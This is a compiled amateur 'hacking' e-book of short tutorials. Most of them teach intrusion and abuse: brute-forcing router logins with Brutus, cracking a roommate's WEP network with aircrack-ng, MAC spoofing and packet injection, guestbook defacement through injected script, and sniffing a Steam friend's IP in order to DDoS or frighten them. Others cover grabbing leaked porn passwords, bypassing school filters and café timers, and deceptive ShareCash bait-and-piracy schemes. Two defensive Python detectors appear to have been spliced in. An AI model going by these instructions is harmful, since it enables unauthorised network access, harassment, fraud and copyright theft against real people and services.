POWER OF HACKING BOOK 6

Power Of Hacking®

Mail:mtahirzahid@yahoo.com

How to change your folder's background

Step 1: Have the folder you want to put the background on open.

Step 2: Open up Notepad, then simply paste in this code:

    [{BE098140-A513-11D0-A3A4-00C04FD706EC}]
    iconarea_image=***Picture Location Here!***\***Name of File!***

Step 3: Go to the picture you want to use, right click it, select Properties and find the file location. For example, let's say my file is in "my hard drive"; it would be located at "C:\". Understand? Copy the location!

Step 4: Now go back to your text document (Notepad) and, where it says ***Picture Location Here!***, paste the location you copied in the previous step.

Step 5: Now, where it says ***Name of File!***, type the name of the file including the extension (.jpg, .bmp, .jpeg, etc.).

Step 6: Save the text document as "desktop.ini"; be sure to remember the .ini extension! Click Save as "All Files", not "Text Document", and save the document in the folder where you want the background to be. Now just close the folder and open it again; it should show the picture as a background!

Chat with Friends through MS-DOS Command Prompt

1) All you need is your friend's IP address and your Command Prompt.

2) Open Notepad and write this code exactly as it is:

    @echo off
    :A
    Cls
    echo MESSENGER
    set /p n=User:
    set /p m=Message:
    net send %n% %m%
    Pause
    Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (the .bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

7) Now, type the IP address of the computer you want to contact and press Enter. You will see something like this:

8) Now all you need to do is type your message and press Enter. Start chatting!

How To Close Ports

So I've been looking for a while on just how to close a port on a computer. I simply couldn't find a way. Well, I finally found it. This'll only work for Windows users (unless your Unix version OS has netsh). It's actually quite simple. Here's the command for it:

    netsh firewall delete portopening TCP portnumber

It's that simple. Simply go to START -> RUN -> and type in that command up there, and it'll close it for you. Or, you can also open up Command Prompt (START -> RUN -> CMD) and type in "netsh" without the quotes to get to your Windows firewall settings. However, since I'm such a nice guy, I wrote it all out in a VBS script for you so that it's automatically runnable, as well as a batch script. So here you are, fellas:

.VBS Script

    set ss = createobject("wscript.shell")
    set ws = wscript
    dim PORT
    PORT = InputBox("Enter the port you wish to close:")
    ss.run "netsh.exe"
    ws.sleep 1000
    ss.sendkeys "firewall delete portopening TCP " & PORT
    ss.sendkeys "{enter}"
    ws.sleep 500
    'ss.sendkeys "exit"
    'ss.sendkeys "{enter}"

.BAT Script

    @echo off
    title Port Closer
    echo Port Closer
    echo.
    set /p port=Type the port number you wish to close here:
    netsh firewall delete portopening TCP %port%
    msg /w * Port %port% has been closed.
    Exit

How To Crack A Router For Username and Password

(I will be using Brutus to crack a TP-Link router.)

1. When we want to access our router, it will be password protected. We can try the default username and password.

As you can see, it is password protected.

2. I will open up my Brutus.

3. Configure Brutus. Put the target as the router's IP address. Put in the userlist and the passlist. After everything is OK, press START. As you can see from the picture above, Brutus is cracking the router.

4. Wait for Brutus to finish cracking the router. You will get this result.
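From the router owner's side, the Brutus run above is a burst of failed logins from one address against the admin page. As an added example that is not part of this book and not Brutus code, the Python below scans constructed admin-login log lines (the line format is hypothetical) for that pattern with a sliding window, and also reports whether a flagged source then logged in successfully, which is the signal that the default or weak password has already been guessed and must be changed.

```python
"""Detect password-guessing bursts against an admin login page.

Added defender-side example (not part of the original book and not the
Brutus tool's code). It parses constructed, hypothetical router web-admin
log lines of the form:

    2009-06-12T10:15:01 192.168.0.50 POST /login.cgi 401

and flags any source that produces THRESHOLD or more failed logins (HTTP
401) inside a WINDOW_SECONDS sliding window, which is what a wordlist
attack like the one described above looks like from the router's side.
"""
from collections import defaultdict, deque
from datetime import datetime

THRESHOLD = 5          # failed logins that trigger an alert
WINDOW_SECONDS = 60    # sliding window length

# Constructed sample log: one normal user, one host running a wordlist.
SAMPLE_LOG = """\
2009-06-12T10:15:01 192.168.0.50 POST /login.cgi 401
2009-06-12T10:15:09 192.168.0.50 POST /login.cgi 200
2009-06-12T10:16:00 192.168.0.77 POST /login.cgi 401
2009-06-12T10:16:01 192.168.0.77 POST /login.cgi 401
2009-06-12T10:16:01 192.168.0.77 POST /login.cgi 401
2009-06-12T10:16:02 192.168.0.77 POST /login.cgi 401
2009-06-12T10:16:02 192.168.0.77 POST /login.cgi 401
2009-06-12T10:16:03 192.168.0.77 POST /login.cgi 401
2009-06-12T10:16:04 192.168.0.77 POST /login.cgi 200
"""


def parse_line(line):
    """Split one log line into (timestamp, source_ip, status_code)."""
    ts, src, _method, _path, status = line.split()
    return datetime.fromisoformat(ts), src, int(status)


def find_bruteforce(log_text, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Return a dict: source_ip -> timestamp of the failure that tripped the alert.

    Each source keeps a deque of its recent failure timestamps; entries older
    than the window are evicted before the count is compared to the threshold.
    A later successful login does not clear the alert: that is the case a
    defender cares about most.
    """
    recent = defaultdict(deque)
    alerts = {}
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, src, status = parse_line(raw)
        if status != 401:
            continue
        q = recent[src]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = ts
    return alerts


def succeeded_after_alert(log_text, alerts):
    """Sources that logged in successfully (200) after being flagged."""
    compromised = set()
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, src, status = parse_line(raw)
        if status == 200 and src in alerts and ts >= alerts[src]:
            compromised.add(src)
    return compromised


if __name__ == "__main__":
    hits = find_bruteforce(SAMPLE_LOG)
    for src, when in hits.items():
        print(f"ALERT {src}: {THRESHOLD} failed logins within {WINDOW_SECONDS}s by {when}")
    for src in succeeded_after_alert(SAMPLE_LOG, hits):
        print(f"  {src} then logged in successfully: treat the credentials as guessed")
```

Against the constructed log, 192.168.0.77 trips the alert on its fifth failure and then logs in; the single failure from 192.168.0.50 is ordinary user error and is not reported. Routers that expose this kind of log can feed it to the same logic; a lockout or rate limit on the login page is the corresponding mitigation.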

How to Crack a WEP Encrypted Wireless Network on Windows Vista

First, you can only use this method to crack a WEP encrypted network. WEP has been replaced by WPA encryption, which is stronger but can still be cracked, just not as easily. To find out if the network you want to crack is WEP encryption, simply view the wireless networks in the Connect to a network box and hold your mouse over the network of choice. A little box will tell you the encryption. If it says WEP, good, we can proceed; if it says anything else this tutorial won't help.

First, to understand what you will be doing: you will be using a program to capture packets and then use another program to analyze those packets and crack the key, thus allowing you to have access to their network. To capture packets (data from the network we are trying to crack) you must have the program running on your computer and you must capture about 200 000 or more IV packets (a special type of packet). I will show you how to capture the correct type of packets. Also, ONLY certain types of wireless cards can actually capture wireless packets. In order to capture packets your wireless card must be able to go into monitor mode; not every driver or every wireless card supports monitor mode. In most cases you will have to download a special driver designed for your wireless card to put it into monitor mode. I had to purchase a new wireless card because mine was not supported. The program you will be using has a list of supported wireless cards and comes with the drivers needed (lucky you).

Ok, down to business. First, the program you need to capture packets can be downloaded from this link: http://www.tamos.com/download/main/ca.php

Next, the program to analyze the packets and figure out the password can be downloaded from my own site. I got it to work for Windows Vista and then zipped it all into a folder for you. To get this to run all you have to do is extract it, open the aircrack folder, then open the bin folder, then double click on Aircrack-ng GUI.exe. Here is the download link: http://www.howtovideos.ca/images/aircrackVista.rar Just click it and save the file.

Now for the dirty work; keep in mind this could take a few days to capture enough packets. First install the CommView for WiFi program. You do this by extracting the setup file from the file we downloaded earlier (ca6.zip). Then double click setup.exe and follow the prompts. When CommView opens for the first time it has a driver installation guide. This replaces the old driver with a newer, better, and more improved version! Hooray. Follow the prompts to install your new driver and now we are ready to capture. If everything has gone as planned, when you open CommView for WiFi the little play button in the top left corner will be blue. If it is not blue the driver has not been installed properly.

Moving on. Click the blue button in the top left corner and then click Start Scanning. CommView for WiFi now starts scanning each channel looking for data that is being sent. It will list each network it finds. Now click each host until you find the name of the network key you are trying to find. Now select the appropriate channel (my network is broadcasting on channel 6 so I will start capturing all data on channel 6). Click Capture. CommView for WiFi is now capturing all the packets being sent over channel 6.

Once CommView for WiFi collects enough packets aircrack can analyze them and crack the wireless key. The thing is, you only need certain packets, and if you collect too many unneeded packets aircrack may get confused. To help make things easier follow the next few steps. First of all we only want packets from one host, not all of them. As you can see from my screenshot below, I am collecting packets from 7 different networks. A few are WPA encrypted and a few are WEP. I really only want to collect data being sent from one network, so in order to do this all you have to do is right click on the wireless network you want to crack and select Copy MAC Address. Now click on the Rules tab. On the left side under Simple Rules click MAC Addresses. For Action select Capture, and for Add Record select Both. Now click inside the entry form box and hit Ctrl+V (to paste the MAC address) or right click and select Paste. Now hit Add MAC Address. What we just did is make a rule so that CommView for WiFi will only capture packets coming from a certain MAC address (the one we want). Great, almost done.

Now, to make things even easier for Aircrack, you only want to capture DATA packets. There are 3 types to select from: Management packets, Data packets and Control packets. We only want Data packets because that is where the information is that Aircrack needs to crack the wireless encryption passkey. Simply select the D, and unselect the M and the C. Now CommView for WiFi is only capturing Data packets. To be more specific, CommView for WiFi is only capturing Data packets to and from a specific MAC address.

Now that everything is set up to capture the right types of packets we should start saving the logs. You have to save all of the packets into a log for Aircrack to analyze them. You can set CommView for WiFi to save them automatically, or just save them yourself periodically. It is a good idea to have them auto save because it splits them into nicely sized logs, and if you accidentally close CommView for WiFi they will save and you won't lose all your packets! To do that just go to the Logging tab and enable auto saving. You can change the settings if you would like (I recommend increasing the maximum directory size to something like 100000).

And now we wait. We have to capture over 15000 IV packets. Because we set up some rules most of the packets we capture will be IV packets (these are a certain type of Data packet with information used to crack the wireless key). It took me about 4 days to capture enough packets, but I was not running CommView for WiFi non stop. If you are close to the network and there is heavy traffic, it may only take you a few hours.

Ok, what do you do now? Alright, so now 20000 packets (or more) later we are ready to crack the WEP wireless key. First let's convert all of the log files to .cap format (shown in screenshot below). When I cracked my first WEP key with this method I had 4 log files and about 220 000 packets. Go to wherever you have your log files saved and double click to open it. Now click on File -> Export Logs -> Tcpdump Format. Save it as 1.cap. Do the rest of your logs, saving them in sequential order: 1.cap, 2.cap, 3.cap etc.

Now that you have all of your log files saved in .cap format let's open Aircrack. Open the aircrack folder (wherever you extracted it) then open the Bin folder, now double click Aircrack-ng GUI.exe. Aircrack will open; click the Choose button and navigate to where you have your log files saved. To select all of your log files (saved in .cap format) hold down CTRL and click each file, then hit Open. Now click Launch. Aircrack shows you all of the different BSSIDs that it captured data from and assigns an index number to each one, then it asks you "Index number of target network?" You want to enter the number of the network you want to crack. Mine is called CrackMePlease so I am selecting 15. Enter the index number and then press Enter; if you have enough IVs then it should give you the WEP key. If not, go back and capture more and try again.

How To Crack WEP In Linux

I'm using Ubuntu 8.10, but all the commands are compatible with all other Linux distros.

1. Open terminal and type:

    sudo -s
    (enter password)
    apt-get install aircrack-ng

(Here it shows lots of cool shenanigans in verbose mode, just enjoy.) Note: it might prompt you with something like "this file will take 8995kb.. do you wish to install [Y/N]" (the correct answer being Y for yes). Alright, you have just installed aircrack-ng on your computer, congratulations!

2. ifconfig wlan0 down

This command puts your wireless card into "monitor mode." If this line doesn't work for you, try "ifconfig ath0 down" or the connection type you are using. I'm going to continue using wlan0 as that applies to me; you will just replace wlan0 with your specific device code. OR

    iwconfig wlan0 mode monitor

if neither of the above work for you. Once again, it depends on your computer.

3. Your goal now is to find your target. My goal is my roommate's wireless router, which is using WEP encryption, how convenient! First, for educational purposes, type airodump-ng into the terminal; this shows all the commands airodump is capable of, very important if you want to go after something a tad different or specific.

We want to find the target. Type:

    airodump-ng --showack wlan0
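The same listing is what the owner of a wireless network should be reading, because it names every ESSID, BSSID, channel and encryption type in range. As an added example that is not from this book and not part of the aircrack-ng project, the Python below parses a constructed CSV listing in the shape of the file airodump-ng writes with -w (the exact column layout is an assumption; check it against your version) and flags what an owner should fix: networks still on WEP, open networks, and, going one step beyond the text, any access point advertising an ESSID you operate from a BSSID that is not in your own inventory. The OWNED_APS inventory is hypothetical.

```python
"""Audit an airodump-ng style access-point listing for weak encryption.

Added defender-side example, not from the book and not part of the
aircrack-ng project. airodump-ng can write the networks it sees to a CSV
file; the sample below is CONSTRUCTED in the shape of that file's
access-point table, reusing the ESSID/BSSID/channel quoted in the text
above. The exact column layout is an assumption: verify it against the
airodump-ng version you run.
"""
import csv
import io

# Constructed sample: header row plus four access points.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:22:15:23:6E:E2, 2009-06-12 10:15:01, 2009-06-12 10:20:33, 11, 54, WEP, WEP, , -40, 120, 5010, 0. 0. 0. 0, 11, Rob and Big,
00:1A:2B:3C:4D:5E, 2009-06-12 10:15:02, 2009-06-12 10:20:33, 6, 54, WPA2, CCMP, PSK, -52, 98, 0, 0. 0. 0. 0, 9, CorpWiFi,
00:DE:AD:BE:EF:01, 2009-06-12 10:16:10, 2009-06-12 10:20:30, 6, 54, WPA2, CCMP, PSK, -67, 40, 0, 0. 0. 0. 0, 9, CorpWiFi,
00:11:22:33:44:55, 2009-06-12 10:15:05, 2009-06-12 10:20:31, 1, 54, OPN, , , -70, 77, 0, 0. 0. 0. 0, 7, FreeNet,
"""

# Hypothetical inventory: ESSIDs we operate and the BSSIDs we know we deployed.
OWNED_APS = {"CorpWiFi": {"00:1A:2B:3C:4D:5E"}}


def parse_airodump_csv(text):
    """Return a list of dicts, one per access-point row, values stripped of whitespace."""
    reader = csv.reader(io.StringIO(text), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    rows = []
    for row in reader:
        if len(row) < len(header):
            continue  # blank line, or the station table that follows in a real file
        rows.append({k: v.strip() for k, v in zip(header, row)})
    return rows


def audit(rows, owned=OWNED_APS):
    """Return (bssid, essid, finding) tuples a network owner should act on.

    Findings: WEP (deprecated; the key is recoverable from captured IVs as
    the text above describes), OPEN (no encryption at all), and
    UNKNOWN-BSSID (an AP advertising an ESSID we own from a BSSID that is
    not in our inventory, i.e. a possible rogue access point).
    """
    findings = []
    for ap in rows:
        privacy = ap["Privacy"].upper()
        bssid, essid = ap["BSSID"], ap["ESSID"]
        if "WEP" in privacy:
            findings.append((bssid, essid, "WEP"))
        elif privacy == "OPN":
            findings.append((bssid, essid, "OPEN"))
        if essid in owned and bssid not in owned[essid]:
            findings.append((bssid, essid, "UNKNOWN-BSSID"))
    return findings


if __name__ == "__main__":
    for bssid, essid, finding in audit(parse_airodump_csv(SAMPLE_CSV)):
        print(f"{finding:14} {bssid}  {essid!r}")
```

On the constructed sample this reports "Rob and Big" as WEP, FreeNet as open, and the second CorpWiFi BSSID as unknown; the WPA2 access point you deployed yourself produces nothing. The fix for a WEP finding is to move that network to WPA2/WPA3, not to tune the capture.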

We see that the target ESSID is "Rob and Big", the encryption type is WEP, the BSSID number is "00:22:15:23:6E:E2", and finally the channel number is 11. You must know the enemy well if you want to hack it successfully. Now that we know all this very important information, we shall begin our attack!

    airodump-ng -w First --showack --berlin 3000 --bssid 00:22:15:23:6E:E2 -C 11 wlan0

Holy shnap! That was a lot! Here is what we just did:

-w -> saves all the important stuff to a file (First being the file name)
--showack -> shows some cool information, idk, I like it just cause it's always changing, not really necessary
--berlin 3000 -> keeps the cool numbers on the screen even longer; like I said, not totally important, but definitely looks cool! (3000 being the time the numbers are kept on the screen)
--bssid -> defines to the program what BSSID (the router) you want to specifically capture packets from
-C -> defines what channel the program stays on (instead of surfing all 12, it just monitors one now)

Wow! Amazing, tons of cool numbers pop up and entertain us! Whooo hooo! What is actually happening is that the program is capturing packets and saving them to the file you defined above (First). So break out a can of Chef Boyardee and chow away, cause it's going to be a while. You are actually waiting for the number under #Data to reach ~10000 to 100000; the more data is being transferred over the network, the faster this will go.

--Dude! That number is not going up very fast / or, very very very slow! Skip to the bottom, I will explain how to 'fix that'.

-Fantastic! You have ~10000 packets and a full stomach, what now? You have all this information, now you need to decipher it (more commonly known as 'cracking'). KEEP THE AIRODUMP-NG TERMINAL OPEN! Open a new terminal and type:

    sudo -s
    (enter password)
    aircrack-ng -a 1 -b 00:22:15:23:6E:E2 First.cab

Cool! What did I just do?

aircrack-ng -> cracking program, can crack WEP and WPA passcodes
-a -> set the attack mode to WEP (2 is WPA)
-b -> is the network we are attacking (the BSSID is 00:22:15:23:6E:E2)
First.cab -> the file airodump saved all the important shenanigans to (note, the program automatically saves the file as a *.cab file)

Wait.. wait.. wait.. BAM! The password! Congratulations, you have just won the game. Or: "plz collect 5000 more packets" (this is why you left airodump-ng open). aircrack-ng will automatically re-attempt to crack after airodump-ng has collected 5000 more packets. So more Chef Boyardee, and some more patience...

--#Data is going slooowwwwwwwww!!! HELP ME! This is because the user is not actively using the network. You have a choice: wait till he starts using the network again, or 'assist' the network in giving you the packets you need. Now, this is going to be quite a hassle, but stick with it.

    apt-get install macchanger

Stop airodump-ng from working (I just hit Ctrl+C and it stops).

    ifconfig wlan0 down

>> The top half of the airodump terminal screen tells you the network you are gathering packets for; the bottom half lists MAC addresses. Important! With the picture above, I'm going to use the MAC address 00:22:3F:7B:D5:2C. So:

    macchanger -m 00:22:3F:7B:D5:2C wlan0

Now your MAC address is the same as a computer already accepted by the router! Oooo... awwwww.. Now we get to play with a program called aireplay-ng!

    aireplay-ng -3 -b 00:22:15:23:6E:E2 -h 00:22:3F:7B:D5:2C wlan0

-What just happened? aireplay-ng works by injecting packets into the router so you get more traffic between the computers (speeds up the packet retrieval on the airodump-ng side).
-3 is the attack type
'00:22:3F:7B:D5:2C' I just explained what I did above
-b is the enemy BSSID '00:22:15:23:6E:E2'
-h is your spoofed (faked) MAC address '00:22:3F:7B:D5:2C'

Now it will start injecting packets.. Now start up airodump again and wait some more!

    airodump-ng -w First --showack --berlin 3000 --bssid 00:22:15:23:6E:E2 -C 11 wlan0

(just in case you lost it)

WOW! That is how to crack a WEP key. I hope you enjoyed this tut.

How To ''Deface'' A Guestbook With HTML-Injection

Go to Google and search: guestbook.asp

When you find a guestbook, send in this as a comment:

< --- Start of code --- >
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <BODY bgColor=#000000>.
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <title>Hacked By Your_nick</title>
    <script>alert("Hacked By Your_nick - Italian Hackers")</script>
    <style type="text/css">
    <!-.style1 {
    font-size: 36px; font-family: Arial, Helvetica, sans-serif; color: #00FF00; }
    .style2 {font-size: 18px; font-family: Arial, Helvetica, sans-serif; color: #ffffff; }
    .style3 {font-size: 36px; font-family: Arial, Helvetica, sans-serif; color: #000000; font-weight: bold; }
    -->
    </style>
    </head>
    <body>
    <center><p class="style1"><img src="http://www.baywoodracquetclub.com/images/warning.jpg" width="301" height="268"></p></center>
    <p align="center" class="style1"><strong>This Web Site contains bug HaCkEd By Your_Nick - Italian Hackers </strong></p>
    <p align="center" class="style3"><img src="http://www.scuolepistoia.it/lsssalutati/Immagini/Formazione/Progetto%20SOU%20(Spazio%20Orientamento%20Universitario).gif" width="204" height="153"></p>
    <p class="style1"> </p>
    <p class="style1"> </p>
    <p align="center" class="style2"><b>Site HaCkEd By Your_Nick</b></p>
    <p class="style1"> </p>
    <p class="style1">  </p>
    </body>
    </html>
< ---- End of code --- >

Dominating ShareCash!

ShareCash is a site much like Uploading.com, as it allows you to upload files and then pays you as you get others to download your files. The difference between ShareCash and other sites is that ShareCash will pay A LOT more. ShareCash pays 300 to 600 dollars for every 1,000 downloads, where Uploading.com pays around 5 dollars for every 1,000 downloads. What I am going to show you right now is how you can grab a hold of ShareCash and make AT LEAST 50 dollars a day from it!

So first, if you have not yet done so, click www.sharecash.org and sign up for an account. There is no fee to sign up and it takes a few minutes to do so. Now you should familiarize yourself with the site, so take a good 5 minutes or so to look around. Note the Upload button on the side; that is where you will go to upload your files.

THE METHODS!

Now I have spent some serious time developing these methods and making them work. Some are quick and easy and will bring some good cash while others will take more time, but will bring unbelievable cash!

Method 1: Youtube

This is an easy way to get started. People will download anything from YouTube. So to get started make sure you have an account with YouTube. Next go over to Dailymotion and find a good strip tease video where the girl gets naked at some point in the video. Download the video from Dailymotion using www.keepvid.com and fire up Windows Movie Maker. The idea is that we want to post the video up to the point where it becomes obvious that the girl is about to show off some skin (boobs or bottom half) and then we cut the video right there. Now what you're going to do is upload the cut portion to YouTube. Since there is no actual nudity in this video (since you cut it out) YouTube will not take the video down. Upload the entire video to ShareCash and put the link in the description box next to your video. Give the video a long sexy name and watch as people download the entire video from your link in order to see the girl naked! Tons of people search for girls on YouTube so your videos will get plenty of views very fast.

Method 2: Orkut and Myspace method

Sign up for a Yahoo and Myspace account. Make around 300-400 friends on them. It will take a little bit of time but you can do it easily if you spend around 1 hour daily on that and add around 50 persons a day. It's not so easy but it's not so hard either. I got around 500 friends within two weeks. Most important thing: concentrate only on UK, US and Canada people because ShareCash only pays for these countries' signups. It would be much easier for you if you join US and UK communities. If you are comfortable then try to make your profile under a girl's name. Mostly people add a girl more commonly than a guy. After creating an ID with 400-500 friends, add your uploaded pic in your profile or update status. For example: create a Notepad file. Cloak it with your ShareCash link and add it to your profile. Encourage people to download your file by saying that this is your phone number, coolest or sexiest pic of yours, or be wilder, like "this is my nude cam show, download it". There will be many hornies there to download your stuff. Update your profile daily and keep on adding more US and UK friends.

Method 3: Forums are your friend!

Ahh yes, forums, my favorite place to get downloads from. So what we're gonna do for this method is find any porn forum and copy a few porn passwords that people post up. If you just look around at a few places like http://forum.dumpstersluts.com/ you'll find a few passwords. Now go ahead and copy those passwords into a text document and archive it with WinRAR. Here's where we're going to do things a little differently. Most people will go and outright post these files on the forums with your download link. Now this will bring in a few bucks, but when the passwords run out or someone sees a few postings about how they already use these passwords, your thread is pretty much dead. Instead, you're going to sign up to as many porn forums as you can and place your download link in your signature with anchor text such as "Free GangBros Passwords." Then just post all over the place saying things like "Wow nice video" or "Thanks for the videos", stuff like that so people will see your name and signature. If the forum will not allow your download link in the signature just make a free Blogger blog with the download link on there and have your signature redirect them there with the same anchor text. You will see huge traffic with this method, trust me, everyone wants free porn passwords!

Method 4: Roms and Emulators

This is my biggest money maker by far, and it's actually pretty easy to set up. The only reason that this is the most advanced method is because it requires a few things such as a website, hosting and some experience in creating a website and making it look decent. If you can make this method happen you will see a huge amount of downloads come through. What you do is search for Nintendo DS roms and emulators in Google. Now when you find a good site just download as many as you can. I use a few sites to download DS roms, but starting up I just went to Mininova and downloaded a huge file with like 100+ DS roms. This got my site off the ground much faster and took the hassle out of downloading a 100 or so files separately. Just upload all the files to ShareCash separately and post them on your new website. If you keep your site updated with new releases you can get a couple thousand downloads in a day easy. If you submit your site to any of the top 100 Rom lists you can get some awesome traffic that way. Alternatively you can submit to Digg and Reddit claiming that you've found the best DS Rom site on the web. Just remember to put a disclaimer on your site stating that all roms downloaded need to be deleted within 24 hours unless the legal copy is owned. That statement will keep your rom site legal so don't forget it!

Method 5: Digital Comics

Digital comics are very popular on the web currently, and no one is using ShareCash to promote online comics. There are a few things you can do here. For one you can visit http://www.lorencollins.net/freecomic/ and download a few comics and then post them on a Blogger blog. Of course Digg traffic works well here since comics usually cost money to download online. Another way to explode this is to use a site called 4chan.org. Now what you do is visit the comic section, pick a comic book you downloaded and post the front cover and then next to that post the download link. A small description will help with this and get a couple people commenting on it. Again, everyone loves free comics and 4chan is a great place to get your comics downloaded.

Method 6: Exploit Laziness

This is probably my favorite method just because it's actually very creative. What you need to do is go to any manual traffic exchange (look on Google, you'll find a ton) and sign up to a few. Upload a large picture or any small program that is about 1 to 2 megs in size and name it "Traffic Exchange Bot." Make a quick Blogger blog and delete everything from the page except for the post and title. Make the title large and the body easy to read. State
that you have a free traffic exchange bot that they can have to use for the traffic exchange they are on. You can customize the page and make one for each traffic exchange you use. People will download the file hoping for a bot; even if you don't have a bot for them to download, once they download the file and see that it's not a bot they will more than likely just move on with their traffic exchanging while you just got a download out of it! Make sure you .rar the file that you upload so it appears believable. You can participate in the exchange to get credits or just buy some; either way you will get conversions easily since everyone hates having to do manual traffic exchanges.

Method 7: Current Blackhat Niche Method: Michael Jackson of course!

Download a dramatic looking picture of Michael Jackson (a close up of his face or whatever) and edit the photo by placing a caption of a quote and his life span (1958-2009 or whatever). Throw up a Blogger blog saying everyone should pray for Michael Jackson and download this picture and put it as their background for their computer. There are way too many nuts out there for this not to work! Put a link to it on Digg and Reddit with a title saying something like "Support Michael Jackson's family, download this picture and place it as your background. Pictures honoring the king of pop". Just remember to make your title as long as possible and you'll be fine!

Method 8: Take help of websites or blogs

It is the simplest method and yet the most reliable method. If you have a good website which gets around 1K-2K visitors per day then create a simple banner and cloak it with your ShareCash URL. Try to give free ebooks related to your niche. People just love free stuff. For getting a free ebook or something you can simply search on Google, rewrite the whole content and then go. If you want to be a bully then simply copy-paste that method and give it for free. Ask your friends to place your free-stuff cloaked banner or URL on their websites or blogs.

Method 9: Make your website or blog especially for ShareCash

People just love free stuff. When you start getting some decent money from ShareCash, just invest in buying a domain and hosting and make a website dedicated to downloading free stuff. SEO it regularly, or to improve traffic always do Yahoo Answers posting along with a link back to your website. Just don't spam them, otherwise you will be punished.

Conclusion

That's all for ShareCash Domination. I hope you enjoyed this report, now get out there and make it happen! With these methods it'll be hard to not make $50+ a day unless you just don't take action! So now's the time to take action!

How to get IP's through the Steam Client

Step 1: Download the programs

CommView: http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commview&event3=cv6&goto=/files/cv6.zip "The tool used to sniff the IP through the Steam Client"

Steam Client: http://storefront.steampowered.com/download/SteamInstall.msi "If you don't have this you probably shouldn't even be doing this"

Step 2: Installation

Pretty self explanatory to be honest. Just install the Steam Client and CommView (two idiot proof installations).

Step 3: Getting the IP

Right click your Steam Client window at the bottom right of your screen and click "Friends". Pick a friend whose IP you want. Now, open CommView. At the top you should see a little start sign. Click it. Now just send a random message to your victim and start voice chat. Now a bunch of IPs will show up on CommView. If Voice Chat is running you'll see the INs and OUTs on CommView will be rising through the roof. That is the IP. Right click it and click Copy, then click Remote IP Address.

Step 4: Using that information

Now the easy part. Go to http://www.ip-adress.com/ip_tracer/ and put in the IP address of your victim. Now you can either scare the shit out of him with that information or DDoS him/her. Be creative :)

How to get passes to porn sites

Disclaimer: Please be of age (18) to view porn and/or try this exploit. With this tutorial you can get many passes (famous sites) like: Banos, Bazers, reaykings, nautyamerica etc etc.

Download mIRC here: http://www.mirc.com/get.html

Power Of Hacking速 Start mIRC you will get this screen:

Full name: Put a name that you want(hasbullah is not my name) Email address: Put in a spam email that is not yours(people search emails through mIRC to spam your inbox) Nickname: Choose a nice nickname that you want Alternative: Choose a second nickname if yours is already chosen and online by a other person.

Mail:mtahirzahid@yahoo.com

Page 27


Power Of Hacking速 After go to the option Servers and choose add

Fill in this details: Description: Porn channel(or whatever you like. Irc server: Irc.Whatnet.org Ports:6667 Group: Nothing Password: Nothing After adding you will see the server under your choosen description(mine Irc.Whatnet.Org) Double click it then you will come back to the main screen and press there Connect to Server You will get this notification: * Connecting to irc.whatnet.org (6667) -irc.whatnet.org- *** Looking up your hostname -irc.whatnet.org- *** Checking Ident Mail:mtahirzahid@yahoo.com

Page 28


Power Of Hacking速

-irc.whatnet.org- *** Found your hostname And after this screen will pop-up Fill in at Enter a Channel Name and click join:

Mail:mtahirzahid@yahoo.com

Page 29


Channel name: 3x
After joining you will get into a channel:

Click XSS3, 1 or 2. If you got in, it will tell you this:
Welcome to #3x. Welcome to #3x. Search here for your pass before requesting in main. Go slow: BOT ABUSE WILL GET YOU BANNED
If you got that message you are in the right room. Type !search followed by your site, like: !search realitykings
Then the bot will automatically respond to you with a pass.

How to get past your school blocking system without programs
Right, first off, you need to go to: http://g.ho.st/
This is a virtual machine/computer that your sysadmins shouldn't have blocked. At my school, our security is pretty high because of people like me and you. After you are on the website, it should look like this:

OK, now click on the big button that says Start. After that, you should see another screen that looks like this:

Now make an account; you should see the Register button. I have made an account (trust me, it is easy). After you have logged in, you should see another screen that looks something like this:

After you have logged in, you should try and get on the g.ho.st internet (alpha). To get on the internet, follow these steps: on the desktop, click on the icon that says Find cool web stuff. Then click the icon that says Web. Now go to Ghost services, and there should be an icon that says G.ho.st browser (alpha). (If you go on a website and it says "open in a new tab because this site will function better" (or something like that), don't do it. But if you want to, just do it.)

How to get unlimited time in Internet Cafés
Today we're going to learn how to disable the timer on the computers in Internet Cafés. Let's go through the steps, shall we?
1. Create a new text document.
2. Then type CMD in it.
3. Then save it as anything.bat (make sure the file does NOT end in .txt, but in .bat).
4. Go to the location where you saved the .bat file and run it. If you've done this correctly, you'll see that Command Prompt is open.
5. Now that Command Prompt is open, type in: cd\windows (this will change the directory to Windows).
6. Then type in: regedit (this will get you to the Registry Editor GUI).
7. Now navigate to: HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current version>internet settings>policies>system
8. Then in the right pane where it says Disable Taskmanager, right-click on it, scroll down to Modify, and then change its value to "0".
9. Then open Windows Task Manager (CTRL+ALT+DELETE).
10. Then disable the Internet Cafe's timer. If you did this right, then you're done! Well done :D

How to grab IP address with PHP
Today I'll be showing you how to grab somebody's IP address when they visit a page. The variable to use is $_SERVER['REMOTE_ADDR']; it's that simple. You can use it for just about anything; here are a few examples.

Printing the user's IP address:

<?php
// echo takes a comma-separated list; print does not, which is why the
// original print(...) with two arguments was a syntax error.
echo $_SERVER['REMOTE_ADDR'], " I'm Watching You!";
?>

Printing it to a file:

<?php
// Append the visitor's address to a log file, one address per line.
$ip = $_SERVER['REMOTE_ADDR'];
$handle = fopen('ipaddresses.txt', 'a+');
fwrite($handle, $ip);
fwrite($handle, "\n");
fclose($handle);
?>

All you have to do is make a text file, insert any of these codes (or one of your own) and save it as anythingyouwant.php. Then upload it to your website and it'll do the trick :P The possibilities for what you can use this for are endless.

How To Hack An Administrator Account With A Guest Account
(The only way this is going to work is if your account has permission to modify files in the folder "system32".)
